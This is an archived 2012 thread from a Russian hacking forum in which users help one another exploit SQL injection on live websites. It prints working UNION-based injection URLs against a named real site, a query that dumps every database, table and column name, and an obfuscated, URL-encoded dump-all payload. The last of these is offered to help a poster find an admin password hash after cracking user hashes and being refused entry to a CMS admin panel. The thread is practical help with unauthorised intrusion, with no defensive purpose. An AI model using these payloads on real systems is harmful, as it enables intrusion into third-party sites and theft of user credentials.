ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

30.01.2012, 10:01
|
|
Guest
Сообщений: n/a
Провел на форуме: 179355
Репутация:
53
|
|
есть сайт с инъекцией. дальше вывода informaton.schemA не смог уйти.
тут светить не хочу, если кто помочь сможет - в личку пожалст.
Haviji и еще пару средств раскрутки скулей так же не смогли мне помочь
так что, думаю это мб только зелененьким позубам)
|
|
|
|

30.01.2012, 14:15
|
|
Guest
Сообщений: n/a
Провел на форуме: 5709
Репутация:
0
|
|
Ereee, спасибо ! И еще вопрос, список всех таблиц узнал
Сообщение от None
http://reshuege.ru/test?pid=25171-999999.9'))+union+select+1,group_concat(0x0b,table _name),3,4,5,6,7,8+from+information_schema.tables--+
А вот что либо вытянуть не получается, ошибка
Сообщение от None
http://reshuege.ru/test?pid=25171-999999.9'))+union+select+1,2,3,4,5,6,7,8+from+prof iles--+f
|
|
|
|

30.01.2012, 14:33
|
|
Guest
Сообщений: n/a
Провел на форуме: 90728
Репутация:
62
|
|
Сообщение от bodrich
bodrich said:
Ereee
, спасибо ! И еще вопрос, список всех таблиц узнал
А вот что либо вытянуть не получается, ошибка
может profiles в другой бд. какое поле ты хочешь вытянуть если у тебя только список таблиц есть? сливать нужно не только table_name но и table_schema и column_name и всё это, естественно брать не из ..schema.tables, а из ..schema.columns
|
|
|
|

30.01.2012, 15:12
|
|
Guest
Сообщений: n/a
Провел на форуме: 102354
Репутация:
267
|
|
Сообщение от bodrich
bodrich said:
Ereee
, спасибо ! И еще вопрос, список всех таблиц узнал
А вот что либо вытянуть не получается, ошибка
Вот так все выведет:
Код:
Code:
http://reshuege.ru/test?pid=25171-999999.9'))+union+select+1,concat(table_schema,0x3a,table_name,0x3a,column_name),3,4,5,6,7,8+from+information_schema.columns+where+table_schema!='information_schema'--+
Лимитов не надо, из-за особенности скрипта на сайте. Ввиде:
база:таблица:столбцы
|
|
|
|

30.01.2012, 15:36
|
|
Guest
Сообщений: n/a
Провел на форуме: 90728
Репутация:
62
|
|
Сообщение от Ereee
Ereee said:
Вот так все выведет:
Код:
Code:
http://reshuege.ru/test?pid=25171-999999.9'))+union+select+1,concat(table_schema,0x3a,table_name,0x3a,column_name),3,4,5,6,7,8+from+information_schema.columns+where+table_schema!='information_schema'--+
Лимитов не надо, из-за особенности скрипта на сайте. Ввиде:
база:таблица:столбцы
concat_ws трушней. concat не выведет ничего если хоть одно поле null
|
|
|
|

30.01.2012, 21:18
|
|
Новичок
Регистрация: 30.05.2010
Сообщений: 10
Провел на форуме: 42585
Репутация:
0
|
|
есть файл формата .dat , при открытии хекс редактором, вылетает какая то херня. Вопрос: Возможно ли привести к норм виду?
|
|
|

30.01.2012, 21:25
|
|
Guest
Сообщений: n/a
Провел на форуме: 102354
Репутация:
267
|
|
Сообщение от Cherep
Cherep said:
есть файл формата .dat , при открытии хекс редактором, вылетает какая то херня. Вопрос: Возможно ли привести к норм виду?
Ты про 0 и 1? Файл .dat может быть оказатся чем угодно, впрочем как и другие файлы. Если размер велик, то пробуй видео-проигрывателем.
|
|
|
|

30.01.2012, 21:31
|
|
Новичок
Регистрация: 30.05.2010
Сообщений: 10
Провел на форуме: 42585
Репутация:
0
|
|
Сообщение от Ereee
Ereee said:
Ты про 0 и 1? Файл .dat может быть оказатся чем угодно, впрочем как и другие файлы. Если размер велик, то пробуй видео-проигрывателем.
вид вот такой
[CODE]
Code:
њ‡*XЌ>S:Nўn(°эYЫ"њФ–Qўg)}NJтj» ®" Ђ&r_пґШ^‹Х) Ь_VШGBФ^iџN:/AЬ?ЦШ!»qYCЉд
|
|
|

31.01.2012, 00:10
|
|
Guest
Сообщений: n/a
Провел на форуме: 23576
Репутация:
-1
|
|
здрасте, вопрос такой, вот допустим раскрутил я скуля, нашол таблицу с users выдрал от туда запись с id=1, росшыфровал хеш, (при том что использовал запрос типа like '%pas%', выдало мне одну единственную таблицу, тоисть у других поля password нет, но потом я все же перебрал таблицы, действительно записи юзверей хранятся только в этой таблице) захожу в админку - меня не пускает(пробывал не только с id=1),как оказалось это таблица аворизации на самом сайте,тоисть клиенты, в чем может быть подвох? версия скуля 5.0.51a-24+lenny5, админка - CMS Terminator Engine, и где искать хеш админа??
|
|
|
|

31.01.2012, 08:18
|
|
Guest
Сообщений: n/a
Провел на форуме: 102354
Репутация:
267
|
|
2Cherep,
открой любой бинарный файл блокнотом, увидишь то же самое. Откуда файл?
2pirat0,
Хорошо было бы, если скульи выложишь в теме. Но возможно, что пасс админа хранится в файле, а это облом. В выводимый столбц вставь запрос:
Код:
Code:
(%73elect(@x)%66rom(%73elect(@x:=0x00),(%73elect(null)%66rom(%69nformation_schema.%63olumns)%77here(%74able_schema!=0x696e666f726d6174696f6e5f736368656d61)%61nd(0x00)%69n(@x:=%63oncat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,%63olumn_name))))x)
Там вид база:table:column. Найти что-то типа user_rights, user_permisson, admin_user и т.п. Удачи!
|
|
|
|
|
 |
|
|
Здесь присутствуют: 3 (пользователей: 0 , гостей: 3)
|
|
|
|